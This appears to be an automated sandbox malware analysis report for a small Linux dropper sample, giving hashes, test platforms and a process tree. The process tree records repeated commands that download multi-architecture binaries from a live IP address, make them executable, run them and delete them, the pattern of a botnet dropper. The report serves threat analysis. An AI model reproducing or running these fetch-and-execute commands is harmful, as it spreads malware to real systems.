Analysis
-
max time kernel
3s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system -
submitted
17-06-2024 04:29
Static task
static1
Behavioral task
behavioral1
Sample
b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
Resource
debian9-mipsel-20240418-en
General
-
Target
b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
-
Size
1KB
-
MD5
b6c102d8d3cb13f9aa55c32b4d043966
-
SHA1
16bcb4f5e0b2def1e706ff586cd0b0f9166e4b4c
-
SHA256
315c6dff5c2f03934edeeda81919c9558dcb124f1c985160e7d25fa3f01243b1
-
SHA512
9bbb48a0a972c392ba938e7ec6a73ba6c20aa6ea6f2205b63801ee0069e4a0e1228c4fce3b6ddb6400c23081abb6df47b477c26b462820b19f9da01f29b54b27
Malware Config
Signatures
Processes
-
/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118 | /tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118 | 1⤵ | PID:1518
-
/usr/bin/wget | wget http://171.22.24.217/m-i.p-s.GHOUL | 2⤵ | PID:1519
/bin/chmod | chmod +x m-i.p-s.GHOUL | 2⤵ | PID:1523
/tmp/m-i.p-s.GHOUL | ./m-i.p-s.GHOUL | 2⤵ | PID:1524
/bin/rm | rm -rf m-i.p-s.GHOUL | 2⤵ | PID:1525
-
-
/usr/bin/wget | wget http://171.22.24.217/m-p.s-l.GHOUL | 2⤵ | PID:1526
/bin/chmod | chmod +x m-p.s-l.GHOUL | 2⤵ | PID:1527
/tmp/m-p.s-l.GHOUL | ./m-p.s-l.GHOUL | 2⤵ | PID:1528
/bin/rm | rm -rf m-p.s-l.GHOUL | 2⤵ | PID:1529
-
-
/usr/bin/wget | wget http://171.22.24.217/s-h.4-.GHOUL | 2⤵ | PID:1530
/bin/chmod | chmod +x s-h.4-.GHOUL | 2⤵ | PID:1531
/tmp/s-h.4-.GHOUL | ./s-h.4-.GHOUL | 2⤵ | PID:1532
/bin/rm | rm -rf s-h.4-.GHOUL | 2⤵ | PID:1533
-
-
/usr/bin/wget | wget http://171.22.24.217/x-8.6-.GHOUL | 2⤵ | PID:1534
/bin/chmod | chmod +x x-8.6-.GHOUL | 2⤵ | PID:1535
/tmp/x-8.6-.GHOUL | ./x-8.6-.GHOUL | 2⤵ | PID:1536
/bin/rm | rm -rf x-8.6-.GHOUL | 2⤵ | PID:1537
-
-
/usr/bin/wget | wget http://171.22.24.217/a-r.m-6.GHOUL | 2⤵ | PID:1538
/bin/chmod | chmod +x a-r.m-6.GHOUL | 2⤵ | PID:1539
/tmp/a-r.m-6.GHOUL | ./a-r.m-6.GHOUL | 2⤵ | PID:1540
/bin/rm | rm -rf a-r.m-6.GHOUL | 2⤵ | PID:1541
-
-
/usr/bin/wget | wget http://171.22.24.217/x-3.2-.GHOUL | 2⤵ | PID:1542
/bin/chmod | chmod +x x-3.2-.GHOUL | 2⤵ | PID:1543
/tmp/x-3.2-.GHOUL | ./x-3.2-.GHOUL | 2⤵ | PID:1544
/bin/rm | rm -rf x-3.2-.GHOUL | 2⤵ | PID:1545
-
-
/usr/bin/wget | wget http://171.22.24.217/a-r.m-7.GHOUL | 2⤵ | PID:1546
/bin/chmod | chmod +x a-r.m-7.GHOUL | 2⤵ | PID:1547
/tmp/a-r.m-7.GHOUL | ./a-r.m-7.GHOUL | 2⤵ | PID:1548
/bin/rm | rm -rf a-r.m-7.GHOUL | 2⤵ | PID:1549
-
-
/usr/bin/wget | wget http://171.22.24.217/p-p.c-.GHOUL | 2⤵ | PID:1550
/bin/chmod | chmod +x p-p.c-.GHOUL | 2⤵ | PID:1551
/tmp/p-p.c-.GHOUL | ./p-p.c-.GHOUL | 2⤵ | PID:1552
/bin/rm | rm -rf p-p.c-.GHOUL | 2⤵ | PID:1553
-
-
/usr/bin/wget | wget http://171.22.24.217/i-5.8-6.GHOUL | 2⤵ | PID:1554
/bin/chmod | chmod +x i-5.8-6.GHOUL | 2⤵ | PID:1555
/tmp/i-5.8-6.GHOUL | ./i-5.8-6.GHOUL | 2⤵ | PID:1556
/bin/rm | rm -rf i-5.8-6.GHOUL | 2⤵ | PID:1557
-
-
/usr/bin/wget | wget http://171.22.24.217/m-6.8-k.GHOUL | 2⤵ | PID:1558
/bin/chmod | chmod +x m-6.8-k.GHOUL | 2⤵ | PID:1559
/tmp/m-6.8-k.GHOUL | ./m-6.8-k.GHOUL | 2⤵ | PID:1560
/bin/rm | rm -rf m-6.8-k.GHOUL | 2⤵ | PID:1561
-
-
/usr/bin/wget | wget http://171.22.24.217/p-p.c-.GHOUL | 2⤵ | PID:1562
/bin/chmod | chmod +x p-p.c-.GHOUL | 2⤵ | PID:1563
/tmp/p-p.c-.GHOUL | ./p-p.c-.GHOUL | 2⤵ | PID:1564
/bin/rm | rm -rf p-p.c-.GHOUL | 2⤵ | PID:1565
-
-
/usr/bin/wget | wget http://171.22.24.217/a-r.m-4.GHOUL | 2⤵ | PID:1566
/bin/chmod | chmod +x a-r.m-4.GHOUL | 2⤵ | PID:1567
/tmp/a-r.m-4.GHOUL | ./a-r.m-4.GHOUL | 2⤵ | PID:1568
/bin/rm | rm -rf a-r.m-4.GHOUL | 2⤵ | PID:1569
-
-
/usr/bin/wget | wget http://171.22.24.217/a-r.m-5.GHOUL | 2⤵ | PID:1570
/bin/chmod | chmod +x a-r.m-5.GHOUL | 2⤵ | PID:1571
/tmp/a-r.m-5.GHOUL | ./a-r.m-5.GHOUL | 2⤵ | PID:1572
/bin/rm | rm -rf a-r.m-5.GHOUL | 2⤵ | PID:1573
-